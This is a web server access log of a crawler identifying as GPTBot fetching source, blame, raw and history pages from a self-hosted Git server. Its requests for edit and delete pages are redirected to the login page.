"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:16:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29897] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:16:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29866] [Gzip 12.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:16:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 53066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:16:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11751] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 9829] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:16:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:16:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 3399] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 49145] [Gzip 22.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:16:58:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 35821] [Gzip 11.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 13952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 1923] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 10256] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29903] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:16:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12753] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:58:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:16:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:16:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17638] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:16:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15649] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:58:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/main.py" +[17/Feb/2026:16:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" +[17/Feb/2026:16:58:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:58:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:58:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:58:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12017] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 9800] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17895] [Gzip 8.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 9805] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:16:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17060] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:16:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 901] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:16:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:16:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 